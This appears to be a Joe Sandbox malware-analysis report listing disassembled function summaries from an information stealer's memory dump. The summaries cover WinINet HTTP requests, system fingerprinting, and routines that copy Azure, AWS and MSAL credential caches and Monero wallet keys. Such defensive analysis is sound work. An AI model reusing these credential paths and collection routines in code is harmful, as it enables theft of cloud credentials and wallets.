Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $ $%s\%s$8$?
API String ID: 3246050789-3456310027
Opcode ID: 64b627a4e2be6b2f77b436930dab535af49d674fc00f0e253ea8dc397547011c
Instruction ID: 392c720a10fdf6a8dd1e6477ab310b1e4b4f446e2f6fd5e91aad1e3e946b7420
Opcode Fuzzy Hash: 64b627a4e2be6b2f77b436930dab535af49d674fc00f0e253ea8dc397547011c
Instruction Fuzzy Hash: ED811D72950218ABDB29DF50DD91FEA77B9FF08700F008299E509A6280DF71AB85CF95

Function 003C6280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(003E0DFE,00000001,00000000,00000000,00000000), ref: 003C62E1
StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C6335
HttpOpenRequestA.WININET(00000000,GET,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003C63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003C63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003C63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C646D
InternetCloseHandle.WININET(00000000), ref: 003C64EF
InternetCloseHandle.WININET(00000000), ref: 003C64F9
InternetCloseHandle.WININET(00000000), ref: 003C6503

Strings

GET, xrefs: 003C637C
ERROR, xrefs: 003C6407
ERROR, xrefs: 003C64C9
de-DE, xrefs: 003C635A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET$de-DE
API String ID: 3749127164-1008115567
Opcode ID: 0b71c4f796657ea0047f894e2902b20f05f18470109ffca70ada36720a6085e4
Instruction ID: 178084723601a171a4b1703b7e540b2932c91489d59b1da581b7dd3a0210be27
Opcode Fuzzy Hash: 0b71c4f796657ea0047f894e2902b20f05f18470109ffca70ada36720a6085e4
Instruction Fuzzy Hash: CF716C71A40318ABDB15DBE0DC5AFEE7778BB44700F108199F50AAB290DBB46E85CF51

Function 003D1A10 Relevance: 23.6, APIs: 2, Strings: 11, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D7542
Part of subcall function 003D7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003D757F
Part of subcall function 003D7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7603
Part of subcall function 003D7500: RtlAllocateHeap.NTDLL(00000000), ref: 003D760A

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003D7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D76A4
Part of subcall function 003D7690: RtlAllocateHeap.NTDLL(00000000), ref: 003D76AB

Part of subcall function 003D77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,003DDBC0,000000FF,?,003D1C99,00000000,?,00E6E9F8,00000000,?), ref: 003D77F2
Part of subcall function 003D77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,003DDBC0,000000FF,?,003D1C99,00000000,?,00E6E9F8,00000000,?), ref: 003D77F9

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003D7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E00,00000000,?), ref: 003D79B0
Part of subcall function 003D7980: RtlAllocateHeap.NTDLL(00000000), ref: 003D79B7
Part of subcall function 003D7980: GetLocalTime.KERNEL32(?,?,?,?,?,003E0E00,00000000,?), ref: 003D79C4
Part of subcall function 003D7980: wsprintfA.USER32 ref: 003D79F3

Part of subcall function 003D7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E6EF10,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7A63
Part of subcall function 003D7A30: RtlAllocateHeap.NTDLL(00000000), ref: 003D7A6A
Part of subcall function 003D7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E6EF10,00000000,?,003E0E10,00000000,?,00000000,00000000,?), ref: 003D7A7D

Part of subcall function 003D7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00E6EF10,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7B35

Part of subcall function 003D7B90: GetKeyboardLayoutList.USER32(00000000,00000000,003E05AF), ref: 003D7BE1
Part of subcall function 003D7B90: LocalAlloc.KERNEL32(00000040,?), ref: 003D7BF9
Part of subcall function 003D7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 003D7C0D
Part of subcall function 003D7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003D7C62
Part of subcall function 003D7B90: LocalFree.KERNEL32(00000000), ref: 003D7D22

Part of subcall function 003D7D80: GetSystemPowerStatus.KERNEL32(?), ref: 003D7DAD

GetCurrentProcessId.KERNEL32(00000000,?,00E6EB78,00000000,?,003E0E24,00000000,?,00000000,00000000,?,00E6ED30,00000000,?,003E0E20,00000000), ref: 003D207E

Part of subcall function 003D9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 003D9484
Part of subcall function 003D9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003D94A5
Part of subcall function 003D9470: CloseHandle.KERNEL32(00000000), ref: 003D94AF

Part of subcall function 003D7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7E37
Part of subcall function 003D7E00: RtlAllocateHeap.NTDLL(00000000), ref: 003D7E3E
Part of subcall function 003D7E00: RegOpenKeyExA.KERNEL32(80000002,00E5CE10,00000000,00020119,?), ref: 003D7E5E
Part of subcall function 003D7E00: RegQueryValueExA.KERNEL32(?,00E6E938,00000000,00000000,000000FF,000000FF), ref: 003D7E7F
Part of subcall function 003D7E00: RegCloseKey.ADVAPI32(?), ref: 003D7E92

Part of subcall function 003D7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 003D7FC9
Part of subcall function 003D7F60: GetLastError.KERNEL32 ref: 003D7FD8

Part of subcall function 003D7ED0: GetSystemInfo.KERNEL32(003E0E2C), ref: 003D7F00
Part of subcall function 003D7ED0: wsprintfA.USER32 ref: 003D7F16

Part of subcall function 003D8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E6EDD8,00000000,?,003E0E2C,00000000,?,00000000), ref: 003D8130
Part of subcall function 003D8100: RtlAllocateHeap.NTDLL(00000000), ref: 003D8137
Part of subcall function 003D8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003D8158
Part of subcall function 003D8100: __aulldiv.LIBCMT ref: 003D8172
Part of subcall function 003D8100: __aulldiv.LIBCMT ref: 003D8180
Part of subcall function 003D8100: wsprintfA.USER32 ref: 003D81AC

Part of subcall function 003D87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E28,00000000,?), ref: 003D882F
Part of subcall function 003D87C0: RtlAllocateHeap.NTDLL(00000000), ref: 003D8836
Part of subcall function 003D87C0: wsprintfA.USER32 ref: 003D8850

Part of subcall function 003D8320: RegOpenKeyExA.KERNEL32(00000000,00E6C480,00000000,00020019,00000000,003E05B6), ref: 003D83A4

Part of subcall function 003D8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
Part of subcall function 003D8320: wsprintfA.USER32 ref: 003D8459
Part of subcall function 003D8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
Part of subcall function 003D8320: RegCloseKey.ADVAPI32(00000000), ref: 003D848C
Part of subcall function 003D8320: RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003D8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003E05B7), ref: 003D86CA
Part of subcall function 003D8680: Process32First.KERNEL32(?,00000128), ref: 003D86DE
Part of subcall function 003D8680: Process32Next.KERNEL32(?,00000128), ref: 003D86F3
Part of subcall function 003D8680: CloseHandle.KERNEL32(?), ref: 003D8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 003D265B

Strings

@, xrefs: 003D1CE5
`, xrefs: 003D23F4
P, xrefs: 003D1A8E
0, xrefs: 003D1FDA
X, xrefs: 003D22D5
X, xrefs: 003D1B60
H, xrefs: 003D20EB
x, xrefs: 003D2054
h, xrefs: 003D1E55
(, xrefs: 003D1ED0
x, xrefs: 003D1AD4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID: ($0$@$H$P$X$X$`$h$x$x
API String ID: 3113730047-1961153891
Opcode ID: da85afc802646d0f3ce6dd9c6498ec8ac1050bcdd30745ec7be4359e96a21562
Instruction ID: 13ec291ef97263ffa6759b771ce88430c81943fe25238a9bacb3792523e8fb57
Opcode Fuzzy Hash: da85afc802646d0f3ce6dd9c6498ec8ac1050bcdd30745ec7be4359e96a21562
Instruction Fuzzy Hash: D172B373C10558AACB1BFB90EDA2DEE777CAF14300F5042AAB41666191EF302B49DF65

Function 003D5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5857

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5228

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5318
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D532F
Part of subcall function 003D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003D5364
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D5383
Part of subcall function 003D52C0: lstrlen.KERNEL32(00000000), ref: 003D53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003D5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003D5A0C
Sleep.KERNEL32(0000EA60), ref: 003D5A1B

Strings

ERROR, xrefs: 003D59FE
ERROR, xrefs: 003D577D
ERROR, xrefs: 003D5932
ERROR, xrefs: 003D5636
ERROR, xrefs: 003D5849
ERROR, xrefs: 003D5693

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 51b13efec094fe7f694164bce246fdd2f2962bf361ffd977dde6fb5b5e0df369
Instruction ID: 0456055cb932df795fac92b435d3c68fe80c916d3bf4e807d9b93d634a0e9458
Opcode Fuzzy Hash: 51b13efec094fe7f694164bce246fdd2f2962bf361ffd977dde6fb5b5e0df369
Instruction Fuzzy Hash: 1AE132739106049ACB16FBB0FD52EEE7739AF54340F50852AF4065A291EF346F09DB92

Function 003D4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 003D4DCD

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

lstrcat.KERNEL32(?,00000000), ref: 003D4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 003D4E59

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

lstrcat.KERNEL32(?,00000000), ref: 003D4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 003D4EE5

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49B0
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E08D2), ref: 003D49C5
Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49E2
Part of subcall function 003D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003D4A1E
Part of subcall function 003D4910: lstrcat.KERNEL32(?,00E6F588), ref: 003D4A4A
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FF8), ref: 003D4A5C
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A70
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FFC), ref: 003D4A82
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A96
Part of subcall function 003D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003D4AAC
Part of subcall function 003D4910: DeleteFileA.KERNEL32(?), ref: 003D4B31

Strings

\.azure\, xrefs: 003D4DC1
\.IdentityService\, xrefs: 003D4ED9
msal.cache, xrefs: 003D4EF0
Azure\.IdentityService, xrefs: 003D4EEB
*.*, xrefs: 003D4DD8
\.aws\, xrefs: 003D4E4D
Azure\.azure, xrefs: 003D4DD3
Azure\.aws, xrefs: 003D4E5F
*.*, xrefs: 003D4E64

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: a5d3857acebde08eea3572ace055fd546934e83317ee58118286c4a53764f3de
Instruction ID: ed531333b68e378aee4a5cdcd03b6a43c999e795661ba300c7b1744cfe7b5f79
Opcode Fuzzy Hash: a5d3857acebde08eea3572ace055fd546934e83317ee58118286c4a53764f3de
Instruction Fuzzy Hash: 0E41C67AA4031867DB51F770EC47FEE7338AB24700F004554B5856A1C2FEB4ABC98B92

Function 003C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C12B4
Part of subcall function 003C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003C12BB
Part of subcall function 003C12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003C12D7
Part of subcall function 003C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003C12F5
Part of subcall function 003C12A0: RegCloseKey.ADVAPI32(?), ref: 003C12FF

lstrcat.KERNEL32(?,00000000), ref: 003C134F
lstrlen.KERNEL32(?), ref: 003C135C
lstrcat.KERNEL32(?,.keys), ref: 003C1377

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

